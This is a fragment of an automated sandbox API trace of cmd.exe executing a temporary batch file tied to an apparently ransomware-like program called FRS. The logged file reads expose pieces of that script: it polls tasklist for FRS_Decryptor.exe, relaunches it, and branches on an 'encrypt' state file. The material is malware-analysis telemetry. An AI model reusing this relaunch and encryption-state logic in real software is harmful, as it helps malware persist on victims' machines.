_MaxCount=0x7) returned -3 [0122.807] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0122.807] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0122.807] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0122.807] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0122.807] _wcsnicmp (_String1="COPYCMD", _String2="MYFILES", _MaxCount=0x7) returned -10 [0122.807] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0122.807] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0122.807] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0122.807] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0122.807] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0122.807] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0122.807] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0122.807] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0122.808] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0122.808] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0122.808] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0122.808] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0122.808] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0122.808] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0122.808] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0122.808] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0122.808] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0122.808] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0122.808] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0122.808] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0122.808] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0122.808] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0122.808] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0122.808] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0122.808] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0122.808] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0122.808] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="ping -n 3 127.1", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5JgHKoaOfdp\\Desktop", lpStartupInfo=0xc8e9f0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ping -n 3 127.1", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xc8ea3c | out: lpCommandLine="ping -n 3 127.1", lpProcessInformation=0xc8ea3c*(hProcess=0x36c, hThread=0x24c, dwProcessId=0x118, dwThreadId=0x498)) returned 1 [0122.810] CloseHandle (hObject=0x24c) returned 1 [0122.811] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0122.811] GetEnvironmentStringsW () returned 0xd7e510* [0122.811] FreeEnvironmentStringsA (penv="=") returned 1 [0122.811] WaitForSingleObject (hHandle=0x36c, dwMilliseconds=0xffffffff) returned 0x0 [0124.886] GetExitCodeProcess (in: hProcess=0x36c, lpExitCode=0xc8e9d4 | out: lpExitCode=0xc8e9d4*=0x0) returned 1 [0124.886] CloseHandle (hObject=0x36c) returned 1 [0124.886] _vsnwprintf (in: _Buffer=0xc8eabc, _BufferCount=0x13, _Format="%08X", _ArgList=0xc8e9dc | out: _Buffer="00000000") returned 8 [0124.886] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0124.887] GetEnvironmentStringsW () returned 0xd30508* [0124.887] FreeEnvironmentStringsA (penv="=") returned 1 [0124.887] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0124.887] GetEnvironmentStringsW () returned 0xd7e510* [0124.887] FreeEnvironmentStringsA (penv="=") returned 1 [0124.887] DeleteProcThreadAttributeList (in: lpAttributeList=0xc8ea68 | out: lpAttributeList=0xc8ea68) [0124.887] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0124.887] _close (_FileHandle=3) returned 0 [0124.887] _get_osfhandle (_FileHandle=1) returned 0x28 [0124.887] SetConsoleMode (hConsoleHandle=0x28, dwMode=0x3) returned 1 [0124.887] _get_osfhandle (_FileHandle=1) returned 0x28 [0124.887] GetConsoleMode (in: hConsoleHandle=0x28, lpMode=0x12b5154 | out: lpMode=0x12b5154) returned 1 [0124.887] _get_osfhandle (_FileHandle=0) returned 0x24 [0124.887] GetConsoleMode (in: hConsoleHandle=0x24, lpMode=0x12b5150 | out: lpMode=0x12b5150) returned 1 [0124.887] SetConsoleInputExeNameW () returned 0x1 [0124.888] GetConsoleOutputCP () returned 0x1b5 [0124.888] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x12b5200 | out: lpCPInfo=0x12b5200) returned 1 [0124.888] SetThreadUILanguage (LangId=0x0) returned 0x409 [0124.888] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8f200, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x260 [0124.888] _open_osfhandle (_OSFileHandle=0x260, _Flags=8) returned 3 [0124.888] _get_osfhandle (_FileHandle=3) returned 0x260 [0124.888] SetFilePointer (in: hFile=0x260, lDistanceToMove=2512, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0124.888] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9d0 [0124.888] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f1c4, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f1c4*=0x9e, lpOverlapped=0x0) returned 1 [0124.888] SetFilePointer (in: hFile=0x260, lDistanceToMove=2585, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0124.888] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="for /f \"delims= \" %%i in ('tasklist^|find /i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 73 [0124.888] GetFileType (hFile=0x260) returned 0x1 [0124.888] _get_osfhandle (_FileHandle=3) returned 0x260 [0124.888] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0124.888] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa19 [0124.888] ReadFile (in: hFile=0x260, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xc8f02c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8f02c*=0x55, lpOverlapped=0x0) returned 1 [0124.888] SetFilePointer (in: hFile=0x260, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0124.888] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=42, lpWideCharStr=0x12bc840, cchWideChar=8191 | out: lpWideCharStr="if /i \"%%i\"==\"FRS_Decryptor.exe\" goto 4)\r\n/i \"FRS_Decryptor.exe\"') do (\r\nl_flag.png\r\np\\FRS.exe\"\r\n") returned 42 [0124.888] GetFileType (hFile=0x260) returned 0x1 [0124.888] _get_osfhandle (_FileHandle=3) returned 0x260 [0124.889] SetFilePointer (in: hFile=0x260, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0124.889] _tell (_FileHandle=3) returned 2627 [0124.889] _close (_FileHandle=3) returned 0 [0124.889] _wcsnicmp (_String1="delims= ", _String2="usebackq", _MaxCount=0x8) returned -17 [0124.889] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0124.889] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0124.889] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0124.889] _wpopen (_Command="tasklist|find /i \"FRS_Decryptor.exe\"", _Mode="rb") returned 0x76ea4c68 [0124.893] feof (_File=0x76ea4c68) returned 0 [0124.893] ferror (_File=0x76ea4c68) returned 0 [0124.893] fgets (in: _Buf=0xd818e0, _MaxCount=256, _File=0x76ea4c68 | out: _Buf="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n", _File=0x76ea4c68) returned="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n" [0125.394] feof (_File=0x76ea4c68) returned 0 [0125.394] ferror (_File=0x76ea4c68) returned 0 [0125.394] fgets (in: _Buf=0xd872b6, _MaxCount=434, _File=0x76ea4c68 | out: _Buf="", _File=0x76ea4c68) returned 0x0 [0125.431] _pclose (in: _File=0x76ea4c68 | out: _File=0x76ea4c68) returned 0 [0125.432] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0xd430f6, cbMultiByte=78, lpWideCharStr=0xd430a8, cchWideChar=78 | out: lpWideCharStr="FRS_Decryptor.exe 2380 Console 1 3,144 K\r\n") returned 78 [0125.432] lstrcmpiW (lpString1="\"FRS_Decryptor.exe\"", lpString2="\"FRS_Decryptor.exe\"") returned 0 [0125.432] GetConsoleTitleW (in: lpConsoleTitle=0xc8ebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\cmd.exe") returned 0x1b [0125.432] CreateFileW (lpFileName="C:\\Users\\5JGHKO~1\\AppData\\Local\\Temp\\CCEP00EL.bat" (normalized: "c:\\users\\5jghko~1\\appdata\\local\\temp\\ccep00el.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xc8e900, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2b8 [0125.433] _open_osfhandle (_OSFileHandle=0x2b8, _Flags=8) returned 3 [0125.433] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.433] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2627, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0125.433] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.433] GetFileSize (in: hFile=0x2b8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xa6e [0125.433] _wcsnicmp (_String1="4", _String2=":EOF", _MaxCount=0x4) returned -6 [0125.433] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.433] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0125.433] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.433] GetFileType (hFile=0x2b8) returned 0x1 [0125.433] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa43 [0125.433] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x2b, lpOverlapped=0x0) returned 1 [0125.433] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=2662, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0125.433] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n") returned 35 [0125.433] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0125.433] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.433] GetFileType (hFile=0x2b8) returned 0x1 [0125.433] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa66 [0125.433] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x8, lpOverlapped=0x0) returned 1 [0125.433] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0125.433] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0125.433] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.433] GetFileType (hFile=0x2b8) returned 0x1 [0125.433] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xa6e [0125.433] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x0, lpOverlapped=0x0) returned 1 [0125.433] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.433] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.433] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.433] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.434] GetFileType (hFile=0x2b8) returned 0x1 [0125.434] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0125.434] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0125.434] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=8, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0125.434] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@shift\r\n") returned 8 [0125.434] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0125.434] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.434] GetFileType (hFile=0x2b8) returned 0x1 [0125.434] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8 [0125.434] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0125.434] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=19, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0125.434] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=11, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="@echo off\r\nLES%\\FRS_Decryptor.exe\r\n") returned 11 [0125.434] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0125.434] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.434] GetFileType (hFile=0x2b8) returned 0x1 [0125.434] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x13 [0125.434] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0125.434] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=21, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0125.434] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\ncho off\r\n") returned 2 [0125.434] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0125.434] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.434] GetFileType (hFile=0x2b8) returned 0x1 [0125.434] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x15 [0125.434] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0125.434] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=25, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0125.434] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":1\r\no off\r\n") returned 4 [0125.434] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0125.434] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.434] GetFileType (hFile=0x2b8) returned 0x1 [0125.434] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x19 [0125.435] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0125.435] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=98, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0125.435] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="for /f \"delims=\" %%i in ('find \"e\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\nl_flag.png\r\n") returned 73 [0125.435] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0125.435] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.435] GetFileType (hFile=0x2b8) returned 0x1 [0125.435] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x62 [0125.435] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0125.435] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=130, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0125.435] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="If \\\"%e%\\\"==\\\"encrypt\\\" goto 3\r\ne\" \"C:\\FRS_TEMP\\temp.txt\"')do set n=%%i\r\n") returned 32 [0125.435] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0125.435] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.435] GetFileType (hFile=0x2b8) returned 0x1 [0125.435] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x82 [0125.435] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0125.435] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=135, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0125.435] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=5, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="cls\r\n%e%\\\"==\\\"encrypt\\\" goto 3\r\n") returned 5 [0125.435] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0125.435] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.435] GetFileType (hFile=0x2b8) returned 0x1 [0125.435] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x87 [0125.435] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0125.435] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=143, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0125.435] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 2\r\n\\\"==\\\"encrypt\\\" goto 3\r\n") returned 8 [0125.435] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0125.435] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.435] GetFileType (hFile=0x2b8) returned 0x1 [0125.435] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8f [0125.435] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0125.435] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=145, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0125.436] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=2, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="\r\nto 2\r\n") returned 2 [0125.436] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0125.436] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.436] GetFileType (hFile=0x2b8) returned 0x1 [0125.436] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x91 [0125.436] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0125.436] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=149, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0125.436] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=4, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr=":2\r\n 2\r\n") returned 4 [0125.436] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0125.436] _get_osfhandle (_FileHandle=3) returned 0x2b8 [0125.436] GetFileType (hFile=0x2b8) returned 0x1 [0125.436] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x95 [0125.436] ReadFile (in: hFile=0x2b8, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0125.436] SetFilePointer (in: hFile=0x2b8, lDistanceToMove=196, 